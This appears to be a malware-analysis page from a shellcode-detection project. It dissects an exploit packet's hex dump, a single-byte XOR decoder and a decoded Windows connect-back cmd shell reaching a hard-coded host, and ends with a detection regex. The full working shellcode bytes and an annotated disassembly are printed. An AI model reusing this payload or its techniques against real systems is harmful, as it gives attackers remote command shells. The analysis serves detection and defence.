000005f0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000600: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000610: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000620: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000630: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000640: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000650: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000660: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000670: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000680: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000690: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000700: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000710: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000720: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000730: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000740: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000750: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000760: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000770: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000780: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000790: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000800: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000810: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000820: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000830: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000840: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000850: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000860: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000870: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000880: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000890: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000008b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000008c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008d0: eb 7e eb 7c 7e 15 00 01 - eb 76 eb 74 7e 15 00 01   ........ .v.t....
000008e0: eb 6e eb 6c 7e 15 00 01 - eb 66 eb 64 7e 15 00 01   .n.l.... .f.d....
000008f0: eb 5e eb 5c 7e 15 00 01 - eb 56 eb 54 7e 15 00 01   ........ .V.T....
00000900: eb 4e eb 4c 7e 15 00 01 - eb 46 eb 44 7e 15 00 01   .N.L.... .F.D....
00000910: eb 3e eb 3c 7e 15 00 01 - eb 36 eb 34 7e 15 00 01   ........ .6.4....
00000920: eb 2e eb 2c 7e 15 00 01 - eb 26 eb 24 7e 15 00 01   ........ ........
00000930: eb 1e eb 1c 7e 15 00 01 - eb 16 eb 14 7e 15 00 01   ........ ........
00000940: eb 0e eb 0c 7e 15 00 01 - eb 06 eb 04 7e 15 00 01   ........ ........
00000950: eb 02 eb 05 e8 f9 ff ff - ff 58 83 c0 1b 8d a0 01   ........ .X......
00000960: fc ff ff 83 e4 fc 8b ec - 33 c9 66 b9 a2 01 80 30   ........ 3.f....0
00000970: 93 40 e2 fa e8 77 00 00 - 00 47 65 74 50 72 6f 63   .....w.. .GetProc
00000980: 41 64 64 72 65 73 73 00 - 4c 6f 61 64 4c 69 62 72   Address. LoadLibr
00000990: 61 72 79 41 00 43 72 65 - 61 74 65 50 72 6f 63 65   aryA.Cre ateProce
000009a0: 73 73 41 00 43 6c 6f 73 - 65 48 61 6e 64 6c 65 00   ssA.Clos eHandle.
000009b0: 45 78 69 74 54 68 72 65 - 61 64 00 77 73 32 5f 33   ExitThre ad.ws2.3
000009c0: 32 00 57 53 41 53 74 61 - 72 74 75 70 00 57 53 41   2.WSASta rtup.WSA
000009d0: 53 6f 63 6b 65 74 41 00 - 63 6c 6f 73 65 73 6f 63   SocketA. closesoc
000009e0: 6b 65 74 00 63 6f 6e 6e - 65 63 74 00 63 6d 64 00   ket.conn ect.cmd.
000009f0: 5a b8 0c f0 fd 7f 8b 00 - 8b 70 1c ad 8b 40 08 8b   Z....... .p......
00000a00: d8 8b 73 3c 03 f3 8b 76 - 78 03 f3 8b 7e 20 03 fb   ..s....v x.......
00000a10: 8b 4e 14 33 ed 56 57 51 - 8b 3f 03 fb 8b f2 6a 0e   .N.3.VWQ ......j.
00000a20: 59 f3 a6 74 08 59 5f 83 - c7 04 45 e2 e9 59 5f 5e   Y..t.Y.. ..E..Y..
00000a30: 8b cd 8b 46 24 03 c3 d1 - e1 03 c1 33 c9 66 8b 08   ...F.... ...3.f..
00000a40: 8b 46 1c 03 c3 c1 e1 02 - 03 c1 8b 00 03 c3 8b fa   .F...... ........
00000a50: 8b f7 83 c6 0e 8b d0 6a - 04 59 8b f7 8b ec e8 9b   .......j .Y......
00000a60: 00 00 00 83 c6 0b 52 56 - ff 57 f0 5a 8b d8 33 c9   ......RV .W.Z..3.
00000a70: b1 04 e8 87 00 00 00 83 - c6 08 55 68 01 01 00 00   ........ ..Uh....
00000a80: ff 57 f0 85 c0 75 73 50 - 50 50 50 40 50 40 50 ff   .W...usP PPP.P.P.
00000a90: 57 f4 83 f8 ff 74 63 8b - d8 66 c7 45 00 02 00 66   W....tc. .f.E...f
00000aa0: c7 45 02 07 7f c7 45 04 - d9 9a 6e e6 6a 10 55 53   .E....E. ..n.j.US
00000ab0: ff 57 fc 85 c0 75 43 33 - c9 b1 11 57 8b fd f3 ab   .W...uC3 ...W....
00000ac0: 5f c7 45 00 44 00 00 00 - 89 5d 3c 89 5d 38 89 5d   ..E.D... .....8..
00000ad0: 40 c7 45 2c 01 01 00 00 - 8d 45 44 50 55 51 51 51   ..E..... .EDPUQQQ
00000ae0: 41 51 49 51 51 56 51 ff - 57 e4 ff 75 44 ff 57 e8   AQIQQVQ. W..uD.W.
00000af0: ff 75 48 ff 57 e8 53 ff - 57 f8 50 ff 57 ec 8a 06   .uH.W.S. W.P.W...
00000b00: 46 84 c0 75 f9 51 52 56 - 53 ff d2 5a 59 89 07 47   F..u.QRV S..ZY..G
00000b10: 47 47 47 e2 e9 c3 90 90 - 90 90 90 00 5c 00 43 00   GGG..... ......C.
00000b20: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000b30: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000b40: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000b50: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000b60: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000b70: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000b80: 07 00 00 00 00 00 00 00 - 00                        ........ .

Analysis

XOR decoder "lichtenfels xor" — a single-byte XOR (key 0x93) over the 0x1A2 bytes at 0x974–0xB15; the raw and unxor'd dumps above differ only in that range. The decoder stub sits at 0x950, directly after the jmp sled at 0x8D0–0x94F (every `eb xx` in the sled lands on 0x950; the interleaved dwords `7e 15 00 01` = 0x0100157e are presumably the overwritten pointer/return value, which this page does not confirm).

00000950 ; ---------------------------------------------------------------------------
00000950 ; Decoder stub. Every 'eb xx' of the jmp sled at 0x8D0-0x94F lands here
00000950 ; (e.g. 'eb 7e' at 0x8D0 -> 0x950, 'eb 04' at 0x94A -> 0x950). The dwords
00000950 ; interleaved with the sled (7e 15 00 01 = 0x0100157e) are presumably the
00000950 ; overwritten return address / pointer value -- not confirmed on this page.
00000950 ; The stub is position-independent (jmp/call/pop GetPC), contains no 00 bytes
00000950 ; (0x950-0x973 in the raw dump), and XORs 0x1A2 (418) bytes at 0x974..0xB15
00000950 ; in place with the single-byte key 0x93, then falls through into the decoded
00000950 ; payload at 0x974. Because it writes the bytes it is about to execute, the
00000950 ; buffer must be writable and executable (a non-executable buffer would fault).
00000950 ; Stable wire-level signatures: 'eb 02 eb 05 e8 f9 ff ff ff 58' (GetPC) and
00000950 ; '80 30 93 40 e2 fa' (decode loop). The API name strings in the payload only
00000950 ; exist after decoding, so they cannot be matched on the raw packet bytes.
00000950 ; ---------------------------------------------------------------------------
00000950 loc_950:
00000950                 jmp     short loc_954   ; step 1: hop over the inner jmp
00000952 ; ---------------------------------------------------------------------------
00000952
00000952 loc_952:
00000952                 jmp     short loc_959   ; step 3: entered via the call; 0x959 is now on the stack
00000954 ; ---------------------------------------------------------------------------
00000954
00000954 loc_954:
00000954                 call    loc_952         ; step 2: backward call (e8 f9 ff ff ff) pushes 0x959 as return address
00000959
00000959 loc_959:
00000959                 pop     eax             ; eax = 0x959, the runtime address of this instruction (GetPC)
0000095A                 add     eax, 1Bh        ; eax = 0x974 = first encoded byte (the 'call loc_9F0' of the payload)
0000095D                 lea     esp, [eax-3FFh] ; relocate the stack to 0x575, ~1 KB below the code and inside the
0000095D                                         ; ADMINISTRATIVE_USE_ONLY filler (packet offsets; assumes the packet
0000095D                                         ; body is contiguous in memory), so pushes cannot clobber decoder/payload;
0000095D                                         ; -3FFh instead of -400h keeps the displacement free of 00 bytes
00000963                 and     esp, 0FFFFFFFCh ; 4-byte align the relocated stack
00000966                 mov     ebp, esp        ; ebp = frame pointer for the payload
00000968                 xor     ecx, ecx        ; clear ecx so the 16-bit move below gives a full 32-bit count...
0000096A                 mov     cx, 1A2h        ; ...without the 00 00 that 'mov ecx, 1A2h' would encode
0000096E
0000096E loc_96E:
0000096E                 xor     byte ptr [eax], 93h ; decode one byte in place; the stub itself (0x950-0x973) is not touched
00000971                 inc     eax
00000972                 loop    loc_96E         ; 0x1A2 iterations; then execution falls into the decoded code at 0x974
	 

unxor'd shellcode (decoded payload starting at 0x974; the listing below stops at the first LoadLibrary call — the decoded bytes from 0xA68 to 0xB15 in the unxor'd dump are not disassembled here). Note for analysts: the decoded bytes at 0xA99–0xAAB (`66 c7 45 00 02 00` / `66 c7 45 02 07 7f` / `c7 45 04 d9 9a 6e e6`) fill a sockaddr_in — AF_INET, port 0x077f (1919), address 217.154.110.230 — that is then pushed (`6a 10 55 53`) to a call through the resolved-function table, presumably connect(); that connect-back endpoint is the main network IOC of this sample and is not otherwise called out on this page.

00000974                 call    loc_9F0         ; call-over-data (e8 77 00 00 00): the pushed return address is
00000974                                         ; 0x979, the start of the name table below; loc_9F0 pops it into
00000974                                         ; edx and uses it as the base pointer for API name resolution
00000974 ; ---------------------------------------------------------------------------
00000974 ; Inline NUL-terminated names, back to back. They lie inside the XOR-encoded
00000974 ; region, so they appear only in the "unxor'd" dump, never on the wire.
00000974 ; 'GetProcAddress' (14 chars) is the one name matched directly against
00000974 ; kernel32's export name table (the 0Eh-byte 'repe cmpsb' at loc_A16 with
00000974 ; esi = edx); the remaining names are presumably resolved through
00000974 ; GetProcAddress, with 'ws2_32' loaded via the LoadLibrary call at 0xA68 --
00000974 ; the resolution/call sequence is cut off in this listing, so confirm against
00000974 ; the decoded bytes at 0x9F0-0xB15. WSAStartup/WSASocketA/connect together
00000974 ; with CreateProcessA and the 'cmd' string are consistent with a connect-back
00000974 ; command shell; treat that as a working hypothesis until the tail is traced.
00000979 aGetprocaddress db 'GetProcAddress',0
00000988 aLoadlibrarya   db 'LoadLibraryA',0
00000995 aCreateprocessa db 'CreateProcessA',0
000009A4 aClosehandle    db 'CloseHandle',0
000009B0 aExitthread     db 'ExitThread',0
000009BB aWs2_32         db 'ws2_32',0           ; library name, not an export
000009C2 aWsastartup     db 'WSAStartup',0
000009CD aWsasocketa     db 'WSASocketA',0
000009D8 aClosesocket    db 'closesocket',0
000009E4 aConnect        db 'connect',0
000009EC aCmd            db 'cmd',0              ; command line, presumably the CreateProcessA argument
000009F0 ; ---------------------------------------------------------------------------
000009F0
000009F0 loc_9F0:                                ; payload body; on entry the string table address (979h) is on the stack
000009F0 ; Connect-back ("reverse") shell, not a bind shell: the only socket calls resolved are WSAStartup,
000009F0 ; WSASocketA, connect and closesocket, and the peer address is hard-coded (see ebp+0.. below).
000009F0 ; Register roles: ebx = module base (kernel32, then ws2_32), later the socket; edx = GetProcAddress;
000009F0 ; edi = write cursor over the string table (resolved pointers are read back as [edi-N]);
000009F0 ; esi = name cursor; ebp = stack scratch (WSADATA, sockaddr_in, STARTUPINFOA, PROCESS_INFORMATION).
000009F0 ; Every failure branch goes to loc_AFA (ExitThread): the hosting process is left running.
000009F0                 pop     edx             ; edx = &"GetProcAddress" (return address pushed by the call at 974h)
000009F1                 mov     eax, 7FFDF00Ch  ; get Base of Kernel32: hard-coded PEB+0Ch (Ldr); relies on the fixed PEB address of pre-ASLR 32-bit Windows, so the sample is version-bound
000009F6                 mov     eax, [eax]      ; eax = PEB_LDR_DATA
000009F8
000009F8 loc_9F8:
000009F8                 mov     esi, [eax+1Ch]  ; InInitializationOrderModuleList.Flink (first module)
000009FB                 lodsd                   ; eax = second entry of that list
000009FC                 mov     eax, [eax+8]    ; its DllBase -- kernel32 on the Windows versions this was written for (page comment); on later versions the second init-order module is not kernel32
000009FF
000009FF loc_9FF:                                ; goto Export Table
000009FF                 mov     ebx, eax        ; ebx = module base
00000A01                 mov     esi, [ebx+3Ch]  ; e_lfanew
00000A04                 add     esi, ebx        ; esi = IMAGE_NT_HEADERS
00000A06                 mov     esi, [esi+78h]  ; DataDirectory[0].VirtualAddress = export directory RVA
00000A09                 add     esi, ebx        ; esi = IMAGE_EXPORT_DIRECTORY
00000A0B
00000A0B loc_A0B:
00000A0B                 mov     edi, [esi+20h]  ; AddressOfNames RVA
00000A0E                 add     edi, ebx        ; edi = array of name RVAs
00000A10                 mov     ecx, [esi+14h]  ; loop bound = NumberOfFunctions (+14h); the name array has NumberOfNames (+18h) entries, so the bound is only approximate
00000A13                 xor     ebp, ebp        ; ebp = index of the current name
00000A15                 push    esi             ; keep the export directory across the scan
00000A16
00000A16 loc_A16:                                ; linear scan of the export names for "GetProcAddress"
00000A16                 push    edi
00000A17                 push    ecx
00000A18                 mov     edi, [edi]      ; name RVA
00000A1A                 add     edi, ebx        ; edi = name string
00000A1C                 mov     esi, edx        ; esi = "GetProcAddress"
00000A1E                 push    0Eh
00000A20                 pop     ecx             ; compare 14 bytes = strlen("GetProcAddress"); the terminator is not compared
00000A21                 repe cmpsb
00000A23                 jz      short loc_A2D   ; match: the two saved values stay on the stack for loc_A2D to pop
00000A25                 pop     ecx
00000A26                 pop     edi
00000A27
00000A27 loc_A27:
00000A27                 add     edi, 4          ; next name RVA
00000A2A                 inc     ebp
00000A2B                 loop    loc_A16         ; if nothing matches, execution falls through with ebp == count and indexes past the ordinal/function arrays: there is no failure path
00000A2D
00000A2D loc_A2D:
00000A2D                 pop     ecx
00000A2E                 pop     edi
00000A2F                 pop     esi             ; esi = IMAGE_EXPORT_DIRECTORY again
00000A30                 mov     ecx, ebp        ; ecx = matched name index
00000A32                 mov     eax, [esi+24h]  ; AddressOfNameOrdinals RVA
00000A35                 add     eax, ebx
00000A37                 shl     ecx, 1          ; word-sized entries
00000A39                 add     eax, ecx
00000A3B
00000A3B loc_A3B:
00000A3B                 xor     ecx, ecx
00000A3D
00000A3D loc_A3D:
00000A3D                 mov     cx, [eax]       ; cx = ordinal of GetProcAddress
00000A40
00000A40 loc_A40:
00000A40                 mov     eax, [esi+1Ch]  ; AddressOfFunctions RVA
00000A43                 add     eax, ebx
00000A45                 shl     ecx, 2          ; dword-sized entries
00000A48                 add     eax, ecx
00000A4A                 mov     eax, [eax]      ; function RVA
00000A4C                 add     eax, ebx        ; eax = GetProcAddress
00000A4E                 mov     edi, edx        ; edi = 979h: resolved pointers are written over the string table from here on
00000A50                 mov     esi, edi
00000A52                 add     esi, 0Eh        ; dead: esi is reassigned two instructions below before it is used
00000A55                 mov     edx, eax        ; edx = GetProcAddress (called by getProcAddr)
00000A57                 push    4
00000A59                 pop     ecx             ; resolve the next four names
00000A5A                 mov     esi, edi        ; esi = "GetProcAddress"; getProcAddr skips past it to "LoadLibraryA"
00000A5C                 mov     ebp, esp        ; ebp = scratch area for the structures below (stack placed by the decoder stub)
00000A5E                 call    getProcAddr     ; [979h..988h] = LoadLibraryA, CreateProcessA, CloseHandle, ExitThread; edi = 989h, esi = "ExitThread"
00000A63                 add     esi, 0Bh        ; esi = "ws2_32" (strlen("ExitThread") + 1)
00000A66                 push    edx             ; preserve GetProcAddress across the API call
00000A67                 push    esi             ; lpLibFileName = "ws2_32"
00000A68                 call    dword ptr [edi-10h] ; LoadLibrary: LoadLibraryA("ws2_32")
00000A6B                 pop     edx
00000A6C                 mov     ebx, eax        ; ebx = ws2_32 module handle (a NULL result is not checked)
00000A6E                 xor     ecx, ecx
00000A70                 mov     cl, 4
00000A72                 call    getProcAddr     ; [989h..998h] = WSAStartup, WSASocketA, closesocket, connect; edi = 999h, esi = "connect"
00000A77                 add     esi, 8          ; esi = "cmd" (strlen("connect") + 1)
00000A7A                 push    ebp             ; lpWSAData = scratch at ebp
00000A7B                 push    101h            ; wVersionRequested = 1.1
00000A80                 call    dword ptr [edi-10h] ; WSAStartup
00000A83                 test    eax, eax
00000A85                 jnz     short loc_AFA   ; non-zero = failure
00000A87                 push    eax             ; dwFlags = 0 (eax is 0 here)
00000A88                 push    eax             ; g = 0
00000A89                 push    eax             ; lpProtocolInfo = NULL
00000A8A                 push    eax             ; protocol = 0
00000A8B                 inc     eax
00000A8C                 push    eax             ; type = 1 (SOCK_STREAM)
00000A8D                 inc     eax
00000A8E                 push    eax             ; af = 2 (AF_INET)
00000A8F                 call    dword ptr [edi-0Ch] ; WSASocketA
00000A92                 cmp     eax, 0FFFFFFFFh ; INVALID_SOCKET
00000A95                 jz      short loc_AFA
00000A97                 mov     ebx, eax        ; ebx = the socket
00000A99                 mov     word ptr [ebp+0], 2 ; Type: sockaddr_in.sin_family = AF_INET
00000A9F                 mov     word ptr [ebp+2], 7F07h ; Port: stored as bytes 07 7F, i.e. network-order port 077Fh = 1919
00000AA5                 mov     dword ptr [ebp+4], 0E66E9AD9h ; IP: stored as bytes D9 9A 6E E6, i.e. 217.154.110.230 -- the hard-coded peer (network indicator for this sample)
00000AAC                 push    10h             ; namelen = sizeof(sockaddr_in)
00000AAE                 push    ebp             ; name
00000AAF                 push    ebx             ; s
00000AB0                 call    dword ptr [edi-4] ; connect
00000AB3                 test    eax, eax
00000AB5                 jnz     short loc_AFA   ; SOCKET_ERROR -> exit
00000AB7                 xor     ecx, ecx
00000AB9                 mov     cl, 11h         ; 17 dwords = 44h bytes = sizeof(STARTUPINFOA)
00000ABB                 push    edi             ; keep the pointer-table cursor
00000ABC                 mov     edi, ebp
00000ABE                 rep stosd               ; zero STARTUPINFOA at ebp (eax == 0 after the successful connect); leaves ecx = 0
00000AC0                 pop     edi
00000AC1                 mov     dword ptr [ebp+0], 44h ; 'D' -- cb = sizeof(STARTUPINFOA)
00000AC8                 mov     [ebp+3Ch], ebx  ; hStdOutput = socket
00000ACB                 mov     [ebp+38h], ebx  ; hStdInput  = socket
00000ACE                 mov     [ebp+40h], ebx  ; hStdError  = socket
00000AD1                 mov     dword ptr [ebp+2Ch], 101h ; dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW (wShowWindow left at 0 by the zeroing above)
00000AD8                 lea     eax, [ebp+44h]  ; PROCESS_INFORMATION directly after STARTUPINFOA
00000ADB                 push    eax             ; lpProcessInformation
00000ADC                 push    ebp             ; lpStartupInfo
00000ADD                 push    ecx             ; lpCurrentDirectory = NULL
00000ADE                 push    ecx             ; lpEnvironment = NULL
00000ADF                 push    ecx             ; dwCreationFlags = 0
00000AE0                 inc     ecx
00000AE1                 push    ecx             ; bInheritHandles = TRUE (the child inherits the socket as its std handles)
00000AE2                 dec     ecx
00000AE3                 push    ecx             ; lpThreadAttributes = NULL
00000AE4                 push    ecx             ; lpProcessAttributes = NULL
00000AE5                 push    esi             ; lpCommandLine = "cmd"
00000AE6                 push    ecx             ; lpApplicationName = NULL
00000AE7                 call    dword ptr [edi-1Ch] ; CreateProcessA -- the return value is not checked. Host-side artefact: a cmd.exe child whose std handles are a socket.
00000AEA                 push    dword ptr [ebp+44h] ; hProcess
00000AED                 call    dword ptr [edi-18h] ; CloseHandle
00000AF0                 push    dword ptr [ebp+48h] ; hThread
00000AF3                 call    dword ptr [edi-18h] ; CloseHandle
00000AF6                 push    ebx
00000AF7                 call    dword ptr [edi-8] ; closesocket: closes this thread's copy; the child keeps its inherited handle
00000AFA
00000AFA loc_AFA:                                ; common exit for success and every failure branch
00000AFA                 push    eax             ; dwExitCode = whatever the last call returned
00000AFB                 call    dword ptr [edi-14h] ; ExitThread: only this thread ends; the host process keeps running
00000AFE
00000AFE ; =============== S U B R O U T I N E =======================================
00000AFE
00000AFE
00000AFE getProcAddr     proc near               ; resolve ecx consecutive names with GetProcAddress, storing the pointers at edi
00000AFE ; In:  esi = a NUL-terminated string that is skipped first (each iteration resolves the string
00000AFE ;      after the one esi points at), ecx = number of names, edx = GetProcAddress,
00000AFE ;      ebx = module handle, edi = output cursor (4 bytes per name).
00000AFE ; Out: edi and esi advanced past the last pointer written / last name used; eax = last result.
00000AFE ; Both backward jumps target the proc label: the first scans for the NUL, the loop counts names.
00000AFE ; esi/edi/ebx survive the API call (preserved by the Win32 calling convention); ecx/edx are saved explicitly.
00000AFE                 mov     al, [esi]
00000B00                 inc     esi
00000B01                 test    al, al
00000B03                 jnz     short getProcAddr ; repeat until the byte just consumed was the NUL; esi now points at the next name
00000B05                 push    ecx             ; save the count across the call
00000B06                 push    edx             ; save GetProcAddress itself (edx is volatile)
00000B07                 push    esi             ; lpProcName
00000B08                 push    ebx             ; hModule
00000B09                 call    edx             ; GetProcAddress(hModule, lpProcName); the stdcall callee pops its two arguments
00000B0B                 pop     edx
00000B0C                 pop     ecx
00000B0D                 mov     [edi], eax      ; store the pointer (NULL on failure -- not checked; a later call through the slot would fault)
00000B0F                 inc     edi             ; edi += 4
00000B10                 inc     edi
00000B11                 inc     edi
00000B12                 inc     edi
00000B13                 loop    getProcAddr     ; next name
00000B15                 retn
00000B15 getProcAddr     endp

shellcode patterns

xor

 "(.*)(\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x58\\x83\\xC0\\x1B\\x8D\\xA0"
 "\\x01\\xFC\\xFF\\xFF\\x83\\xE4\\xFC\\x8B\\xEC\\x33\\xC9\\x66\\xB9(..)\\x80\\x30(.)"
 "\\x40\\xE2\\xFA)(.*)$",

bindshell

 
 